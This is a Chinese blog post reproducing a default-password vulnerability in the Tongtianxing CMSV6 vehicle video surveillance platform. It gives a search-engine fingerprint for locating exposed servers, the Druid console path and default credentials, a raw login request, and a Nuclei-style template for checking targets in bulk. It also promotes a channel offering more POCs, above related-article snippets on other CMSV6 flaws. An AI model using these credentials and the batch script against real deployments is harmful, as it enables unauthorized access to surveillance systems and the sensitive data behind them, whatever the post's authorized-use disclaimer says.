【1day漏洞复现】通天星CMSV6车载视频监控平台默认口令漏洞

最新推荐文章于 2024-06-24 20:36:11 发布
最新推荐文章于 2024-06-24 20:36:11 发布
阅读量380 收藏 4
点赞数 10
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34780861/article/details/137070053
版权

更多干货POC获取,请关注公众号:如棠安全

Nx01 阅读须知

      如棠安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

Nx02 漏洞描述
        鸿运主动安全监控云平台实现对计算资源、存储资源、网络资源、云应用服务进行7*24小时全时区、多地域、全方位、立体式、智能化的IT运维监控,保障IT系统安全、稳定、可靠运行。

Nx03 系统指纹

hunter:web.body="./open/webApi.html

Nx05 漏洞复现

隐患地址:/druid/弱口令:ttx/ttx123456.

POST /druid/submitLogin HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/plain, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 42
Connection: close
Cookie: JSESSIONID=4F7D8A071EAC19E6196D1775D84D2F8D

loginUsername=ttx&loginPassword=ttx123456.

Nx06 批量验证脚本

id: rutanganquan

info:
  name: rutanganquan
  author: m0be1
  severity: critical

variables:
  test: "{{to_lower(rand_base(5))}}"

http:
  - raw:
    - |
      POST /druid/submitLogin HTTP/1.1
      Host: {{Hostname}}
      Accept: text/plain, */*; q=0.01
      X-Requested-With: XMLHttpRequest
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
      Origin: http://{{Hostname}}
      Cookie: JSESSIONID=B94D551022416A1706761A9CBA8AB7EC
      Accept-Language: zh-CN,zh;q=0.9
      Content-Type: application/x-www-form-urlencoded; charset=UTF-8
      Referer: http://{{Hostname}}/druid/login.html
      Accept-Encoding: gzip, deflate
      Content-Length: 42

      loginUsername=ttx&loginPassword=ttx123456.


    matchers:
      - type: dsl
        dsl:
          - 'status_code==200 && contains_all(body,"success")'

更多干货POC获取,请关注公众号:如棠安全

如棠安全
关注
  • 10
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞复现】若依系统Druid默认口令漏洞
晚风不及你
02-26 2386
若依系统(RuoYi)是一套基于SpringBoot的权限管理系统,核心技术采用Spring、MyBatis、Shiro,众多政府、企业采用它作为某些系统的权限管理后台,使用率较高。
天星CMSV6车载定位监控平台 point_manage/merge SQL注入致RCE漏洞复现
0xSec
06-24 770
2024年5月,天星CMSV6发布新版本修复了一处SQL注入漏洞漏洞是由于天星CMSV6车载定位监控平台未对用户的输入进行预编译,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。该漏洞过SQL注入实现文件写入进行远程代码执行,获取服务器权限。建议及时修复漏洞
Springboot集成Druid连接池并实现数据库密码加密
老徐的博客只有干货
08-14 6478
Druid介绍 Druid首先是一个数据库连接池。Druid是目前最好的数据库连接池,在功能、性能、扩展性方面,都超过其他数据库连接池,包括DBCP、C3P0、BoneCP、Proxool、JBoss DataSource。Druid已经在阿里巴巴部署了超过600个应用,经过一年多生产环境大规模部署的严苛考验。 同时Druid不仅仅是一个数据库连接池,它包括三个部分: 1.基于Filter-Chain模式的插件体系。 2.DruidDataSource 高效可管理的数据库连接池。 3.SQLParser D
漏洞】【DruidDruid未授权访问漏洞,修复方案。springboot
热门推荐
a987212198的博客
01-20 3万+
Druid未授权访问漏洞,修复思路漏洞描述解决建议 漏洞描述 漏洞描述: Druid是阿里巴巴数据库出品的,为监控而生的数据库连接池,并且Druid提供的监控功能,监控SQL的执行时间、监控Web URI的请求、Session监控,首先Druid是不存在什么漏洞的。但当开发者配置不当时就可能造成未授权访问。 解决建议 解决建议: 修改中间件配置 给出的例子,springboot的配置 spring: datasource: druid: max-active: 10 mi
漏洞复现天星CMSV6车载定位监控平台 point_manage/merge SQL注入致RCE
最新发布
siu~
06-24 703
2024年5月,天星CMSV6发布新版本修复了一处SQL注入漏洞漏洞是由于天星CMSV6车载定位监控平台未对用户的输入进行预编译,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。该漏洞过SQL注入实现文件写入进行远程代码执行,获取服务器权限。建议及时修复漏洞
SRC之若依系统弱口令
杳若的博客
09-14 1847
SRC之若依系统弱口令恰分攻略
鸿运(天星CMSV6车载)主动安全监控云平台StandardReportMediaAction_getImage存在任意文件读取漏洞 附POC软件
nnn2188185的博客
02-26 296
鸿运(天星CMSV6车载)主动安全监控云平台StandardReportMediaAction_getImage存在任意文件读取漏洞 附POC软件
漏洞复现天星CMSV6车载监控平台FTP匿名访问
晚风不及你
01-05 683
深圳市天星科技有限公司,是一家以从事计算机、信和其他电子设备制造业为主的企业。天星车载视频监控平台软件拥有多种语言版本。应用于公交车车载视频监控、校车车载视频监控、大巴车车载视频监控、物流车载监控、油品运输车载监控、警车车载视频监控等公共交上。
鸿运(天星CMSV6车载)主动安全监控云平台inspect_file/upload存在任意文件上传漏洞
wan___she__pi的博客
04-04 824
鸿运(天星CMSV6车载)主动安全监控云平台实现对计算资源、存储资源、网络资源、云应用服务进行7*24小时全时区、多地域、全方位、立体式、智能化的IT运维监控,保障IT系统安全、稳定、可靠运行。
漏洞复现天星CMSV6车载监控平台Druid口令漏洞
晚风不及你
04-25 176
天星CMSV6车载视频监控平台存在Druid口令漏洞,导致攻击者过此漏洞登录系统获取敏感信息。
74cms v4.2.X任意文件读取漏洞
09-06
**74cms v4.2.X任意文件读取漏洞详解** 在网络安全领域,74cms v4.2.X任意文件读取漏洞是一个重要的安全问题,影响了74cms的多个版本,包括v4.2、v4.2.3以及v5.0.1。这个漏洞允许攻击者过特定的手段读取服务器上...
summerVideoCMS 开源视频cms系统 v0.1.0-beta.1
10-13
summerVideoCMS是一个以node.js+MySQL进行开发的一款开源视频管理系统cms 环境要求 本地node开发环境搭建: 1.选择最新版下载 https://nodejs.org/zh-cn/ 2.安装 3.打开cmd输入:node -v 正常出现你下载的版
CSZ CMS 1.2.X sql注入漏洞
09-07
# (CVE-2019-13086)CSZ CMS 1.2.Xsql注入漏洞 ## 一、漏洞简介 CSZ CMS是一套基于PHP的开源内容管理系统(CMS)。 CSZ CMS 1.2.X版本(2019-06-20之前)中的core/MY_Security.php文件存在SQL注入漏洞。该漏洞...
齐博CMS V7任意文件下载漏洞
09-07
# 齐博CMS V7任意文件下载漏洞 ## 漏洞影响 ``` 齐博cms V7 ``` ## FOFA ``` app="齐博cms" ``` ## Poc 综合验证和利用脚本见 Qibo_v7.py
74cms代码执行漏洞
01-03
74cms代码执行漏洞 docker
漏洞复现天星CMSV6车载监控平台getImage任意文件读取漏洞
晚风不及你
03-04 791
深圳市天星科技有限公司,是一家以从事计算机、信和其他电子设备制造业为主的企业。天星车载视频监控平台软件拥有多种语言版本。应用于公交车车载视频监控、校车车载视频监控、大巴车车载视频监控、物流车载监控、油品运输车载监控、警车车载视频监控等公共交上。
漏洞复现天星CMSV6车载视频监控平台存在文件上传漏洞
https://blog.echo234.cn/
03-27 1492
天星CMSV6车载视频监控平台是东莞市天星软件科技有限公司研发的监控平台天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。天星CMSV6车载视频监控平台存在文件上传漏洞
漏洞复现天星CMSV6车载视频监控平台 druid存在默认口令漏洞
https://blog.echo234.cn/
03-27 433
天星CMSV6车载视频监控平台是东莞市天星软件科技有限公司研发的监控平台天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。天星CMSV6车载视频监控平台 druid存在默认口令漏洞
天星CMSV6车载定位监控平台 MobileAction 文件读取漏洞复现
0xSec
12-16 1278
天星CMSV6车载视频监控平台MobileAction_downLoad.action 接口处任意文件读取漏洞,未经身份认证的攻击者可以过此漏洞获取系统内部敏感文件信息,使系统处于极不安全状态。
74CMS v5.0.1 后台 CSRF 漏洞分析与复现
"74cms v5.0.1 后台存在跨站请求伪造(CSRF)漏洞,CVE编号CVE-2019-11374。攻击者可利用此漏洞诱使管理员执行恶意操作,创建新的后台管理员账户,获取系统控制权。受影响的版本仅为74CMS v5.0.1。" ### 漏洞详解 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值